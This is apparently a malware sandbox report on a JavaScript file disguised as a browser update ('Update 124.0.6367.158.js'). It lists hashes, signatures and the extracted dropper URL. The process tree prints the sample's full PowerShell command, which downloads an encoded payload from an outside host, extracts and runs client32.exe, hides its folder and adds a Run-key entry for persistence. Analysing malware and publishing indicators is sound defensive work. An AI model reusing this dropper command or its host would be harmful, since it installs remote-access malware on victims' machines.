Overview

overview

10

Static

static

1

Update 124...158.js

windows7-x64

10

Update 124...158.js

windows10-1703-x64

10

Update 124...158.js

windows11-21h2-x64

3

Analysis

  • max time kernel
    1563s
  • max time network
    1564s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    03-07-2024 13:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Update 124.0.6367.158.js

  • Size

    13.0MB

  • MD5

    b613fd3763e4d2d8a32019015d95a84d

  • SHA1

    201018208e4bf8a2c40b7611ba2042e413d4a7e5

  • SHA256

    b24d7acdc4b26e5829fdf9be02a8bf4b864c99b420c222f4b8066a54981f53c6

  • SHA512

    08e615607fd8722612cac53180c0c2faf231735ff8db9662120e5ef00e343839e2721670ed7f06b7d0e94bd462b4df275a9e1eb6249a898125e9753e5824242b

  • SSDEEP

    49152:CalYOjByIHBJ8V6tlBDBFcLBLtmp3+T2vPHr+Z3jb4JsjcqTbsPF5xhyMA81qIdj:5

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://helpcenter.cyou/help.php?14995
exe.dropper

http://helpcenter.cyou/help.php?14995

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Update 124.0.6367.158.js"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $EOOMKNU='http://helpcenter.cyou/help.php?14995';$JDILN=(New-Object System.Net.WebClient).DownloadString($EOOMKNU);$UPJP=[System.Convert]::FromBase64String($JDILN);$asd = Get-Random -Minimum -10 -Maximum 37; $RSXUQ=[System.Environment]::GetFolderPath('ApplicationData')+'\GFLC'+$asd;if (!(Test-Path $RSXUQ -PathType Container)) { New-Item -Path $RSXUQ -ItemType Directory };$p=Join-Path $RSXUQ 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$UPJP);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RSXUQ)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RSXUQ 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RSXUQ -Force; $fd.attributes='Hidden';$s=$RSXUQ+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='XGPGDUF';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2664

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2664-5-0x0000000002D30000-0x0000000002DB0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2664-6-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2664-7-0x0000000002920000-0x0000000002928000-memory.dmp

    Filesize

    32KB

    Download